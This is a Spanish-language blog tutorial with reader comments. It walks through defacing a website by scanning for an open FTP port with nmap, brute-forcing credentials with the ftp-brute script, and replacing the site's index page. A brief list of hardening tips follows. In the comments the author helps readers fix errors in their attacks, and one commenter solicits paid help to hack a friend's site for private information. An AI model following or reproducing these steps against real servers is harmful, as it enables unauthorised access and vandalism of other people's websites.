Últimamente se ven ataques por grupos hacktivistas, ya sea denegando temporalmente el servicio de una web, o defaceando la misma. El defacing es un tipo de ataque donde se tiene acceso al servidor de aplicaciones web ya sea mediante por ftp, sql injection, entre otros. En este caso mostrare como hacer un defacing por medio de ftp.
Supongamos que este es nuestro objetivo: http://www.pagina.com
Primero tenemos que saber que el servidor que contiene la pagina web tenga abierto el puerto 21, para esto usamos nmap:
./nmap -p 21 pagina.com -d
El resultado tendría que ser el siguiente:
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
Con esto sabemos que el puerto 21 esta abierto, en este caso usaremos un ataque de fuerza bruta usando nmap:
./nmap -p 21 –script=ftp-brute pagina.com -d
Con esto le decimos a nmap, que se vaya defrente al puerto 21 y luego ejecutar un script para realizar el ataque de fuerza bruta usando un diccionario de datos, y con el parámetro «d» aumentamos el detalle de visualización.
El resultado seria:
NSE:ftp-brute: Successful login: user/pass
Luego te conectas al servidor mediante ftp con sus credenciales respectivas:
ftp pagina.com 21
Buscas el directorio donde se ubique el index de la pagina, y te lo bajas:
get index.html index.html
Después editas lo que quieras que se muestre y listo, subes el archivo modificado.
put index.html
Ahora vuelves a ingresar a http://www.pagina.com y veras el cambio que realizaste.
Recomendaciones:
- No dejar el puerto ftp abierto en caso que no lo necesites.
- Cambiar con frecuencia la contraseña del servidor ftp en caso que si lo uses.
- Usar contraseñas fuertes que contengan caracteres, números, mayúsculas y minúsculas
- No tener el servidor de base de datos en el mismo servidor de aplicaciones
- Configurar de forma correcta el firewall.
- Si es posible tener un IDS en tu Red.
Cesar Gomez Cisneros
09/09/2012
hey broder no se puede con esos comandos actualizalos
botnet
10/09/2012
Si, tienes razon. Ahora nmap esta en su version 6. No te preocupes lo actualizo y subire los cambios. Saludos
andres
10/09/2012
u.u esperando actualizacio
botnet
02/10/2012
si se puede, quizas tu tienes el nmap instalado desde repositorios. Te recomiendo que te descargues de la pagina y lo compiles es mas eficaz. Saludos
Moises Alvarado
11/10/2012
es igual desde el windows ?
botnet
07/01/2013
te ubicas en la ruta y pones nmap.exe en vez de ./nmap
alex
31/10/2012
no se si me puedan ayudar pero necesito hackear un web de un amigo para sacar informacion privada pago bien cualkier cosa
comuniquense conmigo correo alex_leo18889@hotmail.com
vierci kasal
04/01/2013
de donde saco el script? :S | ftp-brute:
|_ ERROR: Couldn’t load username list: Cannot find username list
botnet
07/01/2013
en la misma libreria de nmap tienes sus scripts, quizas depende de la version que tienes el nombre puede cambiar.
mono
16/01/2013
con mi nmap no me deja logear varias veces porque sera??
botnet
02/02/2013
en que sistema operativo estas usando y que version de nmap estas usando.
Mario Baugh
28/01/2013
Me da error, dice «Error login didn’t return a proper response» en cualquier página a la que ataque, incluso a la mía (Que manualmente abrí el puerto 21)
botnet
02/02/2013
Trata de instalar un cliente ftp en la maquina que vas a atacar y me comentas que tal te fue.